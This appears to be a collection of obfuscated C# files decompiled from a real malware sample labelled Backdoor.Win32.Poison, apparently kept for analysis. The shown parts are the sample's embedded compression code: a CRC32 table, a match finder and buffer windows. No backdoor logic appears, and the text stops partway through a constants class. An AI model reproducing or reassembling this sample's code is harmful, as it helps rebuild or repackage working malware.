MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0001_0018.cs
+54
View File
@@ -0,0 +1,54 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0002;
using System;
namespace \u0001\u0002
{
internal class \u0001\u0018
{
public static readonly uint[] \u0002 = new uint[256];
private uint \u0001\u001F = uint.MaxValue;
static \u0001\u0018()
{
for (uint index1 = 0; index1 < 256U; ++index1)
{
uint num = index1;
for (int index2 = 0; index2 < 8; ++index2)
{
if (((int) num & 1) != 0)
num = num >> 1 ^ 3988292384U;
else
num >>= 1;
}
\u0001\u0018.\u0002[(IntPtr) index1] = num;
}
}
public void \u0001\u001B() => this.\u0001\u001F = uint.MaxValue;
public void \u0001\u001C(byte b) => this.\u0001\u001F = \u0001\u0018.\u0002[(int) (byte) this.\u0001\u001F ^ (int) b] ^ this.\u0001\u001F >> 8;
public void \u0001\u001D(byte[] data, uint offset, uint size)
{
for (uint index = 0; index < size; ++index)
this.\u0001\u001F = \u0001\u0018.\u0002[(int) (byte) this.\u0001\u001F ^ (int) data[(IntPtr) (offset + index)]] ^ this.\u0001\u001F >> 8;
}
public uint \u0001\u001A() => this.\u0001\u001F ^ uint.MaxValue;
private static uint \u0001\u0019(byte[] data, uint offset, uint size)
{
\u0001\u0018 obj = new \u0001\u0018();
obj.\u0001\u001D(data, offset, size);
return obj.\u0001\u001A();
}
private static bool \u0001\u001E(uint digest, byte[] data, uint offset, uint size) => (int) \u0001\u0018.\u0001\u0019(data, offset, size) == (int) digest;
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0002_0001.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using System;
namespace \u0001\u0002
{
internal class \u0002\u0001 : ApplicationException
{
public \u0002\u0001()
: base("Data Error")
{
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0002_0002.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
namespace \u0001\u0002
{
public interface \u0002\u0002
{
void \u0002\u0003(long inSize, long outSize);
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0002_0004.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
namespace \u0001\u0002
{
public interface \u0002\u0004
{
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0002_0005.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using System;
namespace \u0001\u0002
{
internal class \u0002\u0005 : ApplicationException
{
public \u0002\u0005()
: base("Invalid Parameter")
{
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0002_0006.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0002;
namespace \u0001\u0002
{
public interface \u0002\u0006
{
void \u0002\u000B(\u0001\u0008[] propIDs, object[] properties);
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0002_0007.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
namespace \u0001\u0002
{
public interface \u0002\u0007
{
void \u0002\u000C(byte[] properties);
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0002_0008.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using System.IO;
namespace \u0001\u0002
{
public interface \u0002\u0008
{
void \u0002\u000D(Stream outStream);
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0003/I_0001_000E.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: .I
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0003;
namespace \u0001\u0003
{
internal interface I\u0001\u000E : \u0003\u0011
{
void \u0002\u0010(
uint historySize,
uint keepAddBufferBefore,
uint matchMaxLen,
uint keepAddBufferAfter);
uint \u0002\u0012(uint[] distances);
void \u0002\u001B(uint num);
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0003/_0002_000F.cs
+372
View File
@@ -0,0 +1,372 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0002;
using \u0001\u0003;
using System;
using System.IO;
namespace \u0001\u0003
{
public class \u0002\u000F : \u0003\u0012, I\u0001\u000E, \u0003\u0011
{
private const uint \u0003\u0008 = 1024;
private const uint \u0003\u000A = 65536;
private const uint \u0003\u0005 = 65536;
private const uint \u0003\u000E = 1;
private const uint \u0003\u0009 = 1024;
private const uint \u0003\u0006 = 0;
private const uint \u0003\u000B = 2147483647;
private uint \u0002\u001D;
private uint \u0002\u001E;
private uint \u0003\u0002;
private uint[] \u0003\u0003;
private uint[] \u0002\u001F;
private uint \u0002\u001C = (uint) byte.MaxValue;
private uint \u0003;
private uint \u0003\u0001;
private bool \u0003\u0004 = true;
private uint \u0003\u000D;
private uint \u0003\u000C = 4;
private uint \u0003\u0007 = 66560;
public void \u0002\u001A(int numHashBytes)
{
this.\u0003\u0004 = numHashBytes > 2;
if (this.\u0003\u0004)
{
this.\u0003\u000D = 0U;
this.\u0003\u000C = 4U;
this.\u0003\u0007 = 66560U;
}
else
{
this.\u0003\u000D = 2U;
this.\u0003\u000C = 3U;
this.\u0003\u0007 = 0U;
}
}
public new void \u0002\u0019(Stream stream) => base.\u0002\u0019(stream);
public new void \u0002\u0017() => base.\u0002\u0017();
public new void \u0001\u001B()
{
base.\u0001\u001B();
for (uint index = 0; index < this.\u0003\u0001; ++index)
this.\u0002\u001F[(IntPtr) index] = 0U;
this.\u0002\u001D = 0U;
this.\u0003\u0016(-1);
}
public new void \u0002\u0015()
{
if (++this.\u0002\u001D >= this.\u0002\u001E)
this.\u0002\u001D = 0U;
base.\u0002\u0015();
if (this.\u0003\u001E != (uint) int.MaxValue)
return;
this.\u0003\u0010();
}
public new byte \u0002\u0011(int index) => base.\u0002\u0011(index);
public new uint \u0002\u0013(int index, uint distance, uint limit) => base.\u0002\u0013(index, distance, limit);
public new uint \u0002\u0014() => base.\u0002\u0014();
public void \u0002\u0010(
uint historySize,
uint keepAddBufferBefore,
uint matchMaxLen,
uint keepAddBufferAfter)
{
if (historySize > 2147483391U)
throw new Exception();
this.\u0002\u001C = 16U + (matchMaxLen >> 1);
uint keepSizeReserv = (historySize + keepAddBufferBefore + matchMaxLen + keepAddBufferAfter) / 2U + 256U;
this.\u0002\u0010(historySize + keepAddBufferBefore, matchMaxLen + keepAddBufferAfter, keepSizeReserv);
this.\u0003\u0002 = matchMaxLen;
uint num1 = historySize + 1U;
if ((int) this.\u0002\u001E != (int) num1)
this.\u0003\u0003 = new uint[(IntPtr) ((this.\u0002\u001E = num1) * 2U)];
uint num2 = 65536;
if (this.\u0003\u0004)
{
uint num3 = historySize - 1U;
uint num4 = num3 | num3 >> 1;
uint num5 = num4 | num4 >> 2;
uint num6 = num5 | num5 >> 4;
uint num7 = (num6 | num6 >> 8) >> 1 | (uint) ushort.MaxValue;
if (num7 > 16777216U)
num7 >>= 1;
this.\u0003 = num7;
num2 = num7 + 1U + this.\u0003\u0007;
}
if ((int) num2 == (int) this.\u0003\u0001)
return;
this.\u0002\u001F = new uint[(IntPtr) (this.\u0003\u0001 = num2)];
}
public uint \u0002\u0012(uint[] distances)
{
uint num1;
if (this.\u0003\u001E + this.\u0003\u0002 <= this.\u0004)
{
num1 = this.\u0003\u0002;
}
else
{
num1 = this.\u0004 - this.\u0003\u001E;
if (num1 < this.\u0003\u000C)
{
this.\u0002\u0015();
return 0;
}
}
uint num2 = 0;
uint num3 = this.\u0003\u001E > this.\u0002\u001E ? this.\u0003\u001E - this.\u0002\u001E : 0U;
uint index1 = this.\u0003\u0019 + this.\u0003\u001E;
uint num4 = 1;
uint index2 = 0;
uint num5 = 0;
uint num6;
if (this.\u0003\u0004)
{
uint num7 = \u0001\u0018.\u0002[(int) this.\u0003\u0018[(IntPtr) index1]] ^ (uint) this.\u0003\u0018[(IntPtr) (index1 + 1U)];
index2 = num7 & 1023U;
uint num8 = num7 ^ (uint) this.\u0003\u0018[(IntPtr) (index1 + 2U)] << 8;
num5 = num8 & (uint) ushort.MaxValue;
num6 = (num8 ^ \u0001\u0018.\u0002[(int) this.\u0003\u0018[(IntPtr) (index1 + 3U)]] << 5) & this.\u0003;
}
else
num6 = (uint) this.\u0003\u0018[(IntPtr) index1] ^ (uint) this.\u0003\u0018[(IntPtr) (index1 + 1U)] << 8;
uint num9 = this.\u0002\u001F[(IntPtr) (this.\u0003\u0007 + num6)];
if (this.\u0003\u0004)
{
uint num10 = this.\u0002\u001F[(IntPtr) index2];
uint num11 = this.\u0002\u001F[(IntPtr) (1024U + num5)];
this.\u0002\u001F[(IntPtr) index2] = this.\u0003\u001E;
this.\u0002\u001F[(IntPtr) (1024U + num5)] = this.\u0003\u001E;
if (num10 > num3 && (int) this.\u0003\u0018[(IntPtr) (this.\u0003\u0019 + num10)] == (int) this.\u0003\u0018[(IntPtr) index1])
{
uint[] numArray1 = distances;
int num12 = (int) num2;
uint num13 = (uint) (num12 + 1);
uint index3 = (uint) num12;
int num14;
num4 = (uint) (num14 = 2);
numArray1[(IntPtr) index3] = (uint) num14;
uint[] numArray2 = distances;
int num15 = (int) num13;
num2 = (uint) (num15 + 1);
uint index4 = (uint) num15;
int num16 = (int) this.\u0003\u001E - (int) num10 - 1;
numArray2[(IntPtr) index4] = (uint) num16;
}
if (num11 > num3 && (int) this.\u0003\u0018[(IntPtr) (this.\u0003\u0019 + num11)] == (int) this.\u0003\u0018[(IntPtr) index1])
{
if ((int) num11 == (int) num10)
num2 -= 2U;
uint[] numArray3 = distances;
int num17 = (int) num2;
uint num18 = (uint) (num17 + 1);
uint index5 = (uint) num17;
int num19;
num4 = (uint) (num19 = 3);
numArray3[(IntPtr) index5] = (uint) num19;
uint[] numArray4 = distances;
int num20 = (int) num18;
num2 = (uint) (num20 + 1);
uint index6 = (uint) num20;
int num21 = (int) this.\u0003\u001E - (int) num11 - 1;
numArray4[(IntPtr) index6] = (uint) num21;
num10 = num11;
}
if (num2 != 0U && (int) num10 == (int) num9)
{
num2 -= 2U;
num4 = 1U;
}
}
this.\u0002\u001F[(IntPtr) (this.\u0003\u0007 + num6)] = this.\u0003\u001E;
uint index7 = (uint) (((int) this.\u0002\u001D << 1) + 1);
uint index8 = this.\u0002\u001D << 1;
uint val2;
uint val1 = val2 = this.\u0003\u000D;
if (this.\u0003\u000D != 0U && num9 > num3 && (int) this.\u0003\u0018[(IntPtr) (this.\u0003\u0019 + num9 + this.\u0003\u000D)] != (int) this.\u0003\u0018[(IntPtr) (index1 + this.\u0003\u000D)])
{
uint[] numArray5 = distances;
int num22 = (int) num2;
uint num23 = (uint) (num22 + 1);
uint index9 = (uint) num22;
int num24;
num4 = (uint) (num24 = (int) this.\u0003\u000D);
numArray5[(IntPtr) index9] = (uint) num24;
uint[] numArray6 = distances;
int num25 = (int) num23;
num2 = (uint) (num25 + 1);
uint index10 = (uint) num25;
int num26 = (int) this.\u0003\u001E - (int) num9 - 1;
numArray6[(IntPtr) index10] = (uint) num26;
}
uint num27 = this.\u0002\u001C;
while (num9 > num3 && num27-- != 0U)
{
uint num28 = this.\u0003\u001E - num9;
uint index11 = (uint) ((num28 <= this.\u0002\u001D ? (int) this.\u0002\u001D - (int) num28 : (int) this.\u0002\u001D - (int) num28 + (int) this.\u0002\u001E) << 1);
uint num29 = this.\u0003\u0019 + num9;
uint num30 = Math.Min(val1, val2);
if ((int) this.\u0003\u0018[(IntPtr) (num29 + num30)] == (int) this.\u0003\u0018[(IntPtr) (index1 + num30)])
{
do
;
while ((int) ++num30 != (int) num1 && (int) this.\u0003\u0018[(IntPtr) (num29 + num30)] == (int) this.\u0003\u0018[(IntPtr) (index1 + num30)]);
if (num4 < num30)
{
uint[] numArray7 = distances;
int num31 = (int) num2;
uint num32 = (uint) (num31 + 1);
uint index12 = (uint) num31;
int num33;
num4 = (uint) (num33 = (int) num30);
numArray7[(IntPtr) index12] = (uint) num33;
uint[] numArray8 = distances;
int num34 = (int) num32;
num2 = (uint) (num34 + 1);
uint index13 = (uint) num34;
int num35 = (int) num28 - 1;
numArray8[(IntPtr) index13] = (uint) num35;
if ((int) num30 == (int) num1)
{
this.\u0003\u0003[(IntPtr) index8] = this.\u0003\u0003[(IntPtr) index11];
this.\u0003\u0003[(IntPtr) index7] = this.\u0003\u0003[(IntPtr) (index11 + 1U)];
goto label_29;
}
}
}
if ((int) this.\u0003\u0018[(IntPtr) (num29 + num30)] < (int) this.\u0003\u0018[(IntPtr) (index1 + num30)])
{
this.\u0003\u0003[(IntPtr) index8] = num9;
index8 = index11 + 1U;
num9 = this.\u0003\u0003[(IntPtr) index8];
val2 = num30;
}
else
{
this.\u0003\u0003[(IntPtr) index7] = num9;
index7 = index11;
num9 = this.\u0003\u0003[(IntPtr) index7];
val1 = num30;
}
}
this.\u0003\u0003[(IntPtr) index7] = this.\u0003\u0003[(IntPtr) index8] = 0U;
label_29:
this.\u0002\u0015();
return num2;
}
public void \u0002\u001B(uint num)
{
do
{
uint num1;
if (this.\u0003\u001E + this.\u0003\u0002 <= this.\u0004)
{
num1 = this.\u0003\u0002;
}
else
{
num1 = this.\u0004 - this.\u0003\u001E;
if (num1 < this.\u0003\u000C)
{
this.\u0002\u0015();
goto label_19;
}
}
uint num2 = this.\u0003\u001E > this.\u0002\u001E ? this.\u0003\u001E - this.\u0002\u001E : 0U;
uint index1 = this.\u0003\u0019 + this.\u0003\u001E;
uint num3;
if (this.\u0003\u0004)
{
uint num4 = \u0001\u0018.\u0002[(int) this.\u0003\u0018[(IntPtr) index1]] ^ (uint) this.\u0003\u0018[(IntPtr) (index1 + 1U)];
this.\u0002\u001F[(IntPtr) (num4 & 1023U)] = this.\u0003\u001E;
uint num5 = num4 ^ (uint) this.\u0003\u0018[(IntPtr) (index1 + 2U)] << 8;
this.\u0002\u001F[(IntPtr) (1024U + (num5 & (uint) ushort.MaxValue))] = this.\u0003\u001E;
num3 = (num5 ^ \u0001\u0018.\u0002[(int) this.\u0003\u0018[(IntPtr) (index1 + 3U)]] << 5) & this.\u0003;
}
else
num3 = (uint) this.\u0003\u0018[(IntPtr) index1] ^ (uint) this.\u0003\u0018[(IntPtr) (index1 + 1U)] << 8;
uint num6 = this.\u0002\u001F[(IntPtr) (this.\u0003\u0007 + num3)];
this.\u0002\u001F[(IntPtr) (this.\u0003\u0007 + num3)] = this.\u0003\u001E;
uint index2 = (uint) (((int) this.\u0002\u001D << 1) + 1);
uint index3 = this.\u0002\u001D << 1;
uint val2;
uint val1 = val2 = this.\u0003\u000D;
uint num7 = this.\u0002\u001C;
while (num6 > num2 && num7-- != 0U)
{
uint num8 = this.\u0003\u001E - num6;
uint index4 = (uint) ((num8 <= this.\u0002\u001D ? (int) this.\u0002\u001D - (int) num8 : (int) this.\u0002\u001D - (int) num8 + (int) this.\u0002\u001E) << 1);
uint num9 = this.\u0003\u0019 + num6;
uint num10 = Math.Min(val1, val2);
if ((int) this.\u0003\u0018[(IntPtr) (num9 + num10)] == (int) this.\u0003\u0018[(IntPtr) (index1 + num10)])
{
do
;
while ((int) ++num10 != (int) num1 && (int) this.\u0003\u0018[(IntPtr) (num9 + num10)] == (int) this.\u0003\u0018[(IntPtr) (index1 + num10)]);
if ((int) num10 == (int) num1)
{
this.\u0003\u0003[(IntPtr) index3] = this.\u0003\u0003[(IntPtr) index4];
this.\u0003\u0003[(IntPtr) index2] = this.\u0003\u0003[(IntPtr) (index4 + 1U)];
goto label_18;
}
}
if ((int) this.\u0003\u0018[(IntPtr) (num9 + num10)] < (int) this.\u0003\u0018[(IntPtr) (index1 + num10)])
{
this.\u0003\u0003[(IntPtr) index3] = num6;
index3 = index4 + 1U;
num6 = this.\u0003\u0003[(IntPtr) index3];
val2 = num10;
}
else
{
this.\u0003\u0003[(IntPtr) index2] = num6;
index2 = index4;
num6 = this.\u0003\u0003[(IntPtr) index2];
val1 = num10;
}
}
this.\u0003\u0003[(IntPtr) index2] = this.\u0003\u0003[(IntPtr) index3] = 0U;
label_18:
this.\u0002\u0015();
label_19:;
}
while (--num != 0U);
}
private void \u0002\u0016(uint[] items, uint numItems, uint subValue)
{
for (uint index = 0; index < numItems; ++index)
{
uint num1 = items[(IntPtr) index];
uint num2 = num1 > subValue ? num1 - subValue : 0U;
items[(IntPtr) index] = num2;
}
}
private void \u0003\u0010()
{
uint subValue = this.\u0003\u001E - this.\u0002\u001E;
this.\u0002\u0016(this.\u0003\u0003, this.\u0002\u001E * 2U, subValue);
this.\u0002\u0016(this.\u0002\u001F, this.\u0003\u0001, subValue);
this.\u0003\u0016((int) subValue);
}
public void \u0002\u0018(uint cutValue) => this.\u0002\u001C = cutValue;
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0003/_0003_0011.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using System.IO;
namespace \u0001\u0003
{
internal interface \u0003\u0011
{
void \u0002\u0019(Stream inStream);
void \u0001\u001B();
void \u0002\u0017();
byte \u0002\u0011(int index);
uint \u0002\u0013(int index, uint distance, uint limit);
uint \u0002\u0014();
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0003/_0003_0012.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using System;
using System.IO;
namespace \u0001\u0003
{
public class \u0003\u0012
{
public byte[] \u0003\u0018;
private Stream \u0004\u0001;
private uint \u0003\u001D;
private bool \u0003\u001F;
private uint \u0003\u001C;
public uint \u0003\u0019;
public uint \u0003\u0017;
public uint \u0003\u001E;
private uint \u0003\u001B;
private uint \u0003\u001A;
public uint \u0004;
public void \u0003\u0014()
{
uint num1 = this.\u0003\u0019 + this.\u0003\u001E - this.\u0003\u001B;
if (num1 > 0U)
--num1;
uint num2 = this.\u0003\u0019 + this.\u0004 - num1;
for (uint index = 0; index < num2; ++index)
this.\u0003\u0018[(IntPtr) index] = this.\u0003\u0018[(IntPtr) (num1 + index)];
this.\u0003\u0019 -= num1;
}
public virtual void \u0003\u0015()
{
if (this.\u0003\u001F)
return;
while (true)
{
do
{
int count = -(int) this.\u0003\u0019 + (int) this.\u0003\u0017 - (int) this.\u0004;
if (count == 0)
return;
int num = this.\u0004\u0001.Read(this.\u0003\u0018, (int) this.\u0003\u0019 + (int) this.\u0004, count);
if (num == 0)
{
this.\u0003\u001D = this.\u0004;
if (this.\u0003\u0019 + this.\u0003\u001D > this.\u0003\u001C)
this.\u0003\u001D = this.\u0003\u001C - this.\u0003\u0019;
this.\u0003\u001F = true;
return;
}
this.\u0004 += (uint) num;
}
while (this.\u0004 < this.\u0003\u001E + this.\u0003\u001A);
this.\u0003\u001D = this.\u0004 - this.\u0003\u001A;
}
}
private void \u0003\u0013() => this.\u0003\u0018 = (byte[]) null;
public void \u0002\u0010(uint keepSizeBefore, uint keepSizeAfter, uint keepSizeReserv)
{
this.\u0003\u001B = keepSizeBefore;
this.\u0003\u001A = keepSizeAfter;
uint num = keepSizeBefore + keepSizeAfter + keepSizeReserv;
if (this.\u0003\u0018 == null || (int) this.\u0003\u0017 != (int) num)
{
this.\u0003\u0013();
this.\u0003\u0017 = num;
this.\u0003\u0018 = new byte[(IntPtr) this.\u0003\u0017];
}
this.\u0003\u001C = this.\u0003\u0017 - keepSizeAfter;
}
public void \u0002\u0019(Stream stream) => this.\u0004\u0001 = stream;
public void \u0002\u0017() => this.\u0004\u0001 = (Stream) null;
public void \u0001\u001B()
{
this.\u0003\u0019 = 0U;
this.\u0003\u001E = 0U;
this.\u0004 = 0U;
this.\u0003\u001F = false;
this.\u0003\u0015();
}
public void \u0002\u0015()
{
++this.\u0003\u001E;
if (this.\u0003\u001E <= this.\u0003\u001D)
return;
if (this.\u0003\u0019 + this.\u0003\u001E > this.\u0003\u001C)
this.\u0003\u0014();
this.\u0003\u0015();
}
public byte \u0002\u0011(int index) => this.\u0003\u0018[(long) (this.\u0003\u0019 + this.\u0003\u001E) + (long) index];
public uint \u0002\u0013(int index, uint distance, uint limit)
{
if (this.\u0003\u001F && (long) this.\u0003\u001E + (long) index + (long) limit > (long) this.\u0004)
limit = this.\u0004 - (uint) ((ulong) this.\u0003\u001E + (ulong) index);
++distance;
uint num1 = (uint) ((int) this.\u0003\u0019 + (int) this.\u0003\u001E + index);
uint num2 = 0;
while (num2 < limit && (int) this.\u0003\u0018[(IntPtr) (num1 + num2)] == (int) this.\u0003\u0018[(IntPtr) (num1 + num2 - distance)])
++num2;
return num2;
}
public uint \u0002\u0014() => this.\u0004 - this.\u0003\u001E;
public void \u0003\u0016(int subValue)
{
this.\u0003\u0019 += (uint) subValue;
this.\u0003\u001D -= (uint) subValue;
this.\u0003\u001E -= (uint) subValue;
this.\u0004 -= (uint) subValue;
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0003/_0004_0002.cs
+89
View File
@@ -0,0 +1,89 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using System;
using System.IO;
namespace \u0001\u0003
{
public class \u0004\u0002
{
private byte[] \u0004\u0008;
private uint \u0003\u001E;
private uint \u0004\u0009;
private uint \u0004;
private Stream \u0004\u0001;
public void \u0002\u0010(uint windowSize)
{
if ((int) this.\u0004\u0009 != (int) windowSize)
this.\u0004\u0008 = new byte[(IntPtr) windowSize];
this.\u0004\u0009 = windowSize;
this.\u0003\u001E = 0U;
this.\u0004 = 0U;
}
public void \u0001\u001B(Stream stream, bool solid)
{
this.\u0002\u0017();
this.\u0004\u0001 = stream;
if (solid)
return;
this.\u0004 = 0U;
this.\u0003\u001E = 0U;
}
public void \u0001\u001B(Stream stream) => this.\u0001\u001B(stream, false);
public void \u0002\u0017()
{
this.\u0004\u0005();
this.\u0004\u0001 = (Stream) null;
}
public void \u0004\u0005()
{
uint count = this.\u0003\u001E - this.\u0004;
if (count == 0U)
return;
this.\u0004\u0001.Write(this.\u0004\u0008, (int) this.\u0004, (int) count);
if (this.\u0003\u001E >= this.\u0004\u0009)
this.\u0003\u001E = 0U;
this.\u0004 = this.\u0003\u001E;
}
public void \u0004\u0004(uint distance, uint len)
{
uint num = (uint) ((int) this.\u0003\u001E - (int) distance - 1);
if (num >= this.\u0004\u0009)
num += this.\u0004\u0009;
for (; len > 0U; --len)
{
if (num >= this.\u0004\u0009)
num = 0U;
this.\u0004\u0008[(IntPtr) this.\u0003\u001E++] = this.\u0004\u0008[(IntPtr) num++];
if (this.\u0003\u001E >= this.\u0004\u0009)
this.\u0004\u0005();
}
}
public void \u0004\u0007(byte b)
{
this.\u0004\u0008[(IntPtr) this.\u0003\u001E++] = b;
if (this.\u0003\u001E < this.\u0004\u0009)
return;
this.\u0004\u0005();
}
public byte \u0004\u0006(uint distance)
{
uint index = (uint) ((int) this.\u0003\u001E - (int) distance - 1);
if (index >= this.\u0004\u0009)
index += this.\u0004\u0009;
return this.\u0004\u0008[(IntPtr) index];
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0004/_0004_000A.cs
+71
View File
@@ -0,0 +1,71 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
namespace \u0001\u0004
{
internal abstract class \u0004\u000A
{
public const uint \u0005\u0005 = 4;
public const uint \u0005\u0006 = 12;
public const int \u0005 = 6;
public const int \u0004\u000F = 0;
public const int \u0004\u0017 = 2;
public const uint \u0004\u0018 = 4;
public const uint \u0004\u0012 = 2;
public const int \u0004\u0013 = 4;
public const uint \u0004\u000E = 16;
public const uint \u0004\u000D = 15;
public const uint \u0005\u0007 = 4;
public const uint \u0004\u0010 = 14;
public const uint \u0004\u001F = 10;
public const uint \u0004\u0014 = 128;
public const uint \u0004\u001A = 4;
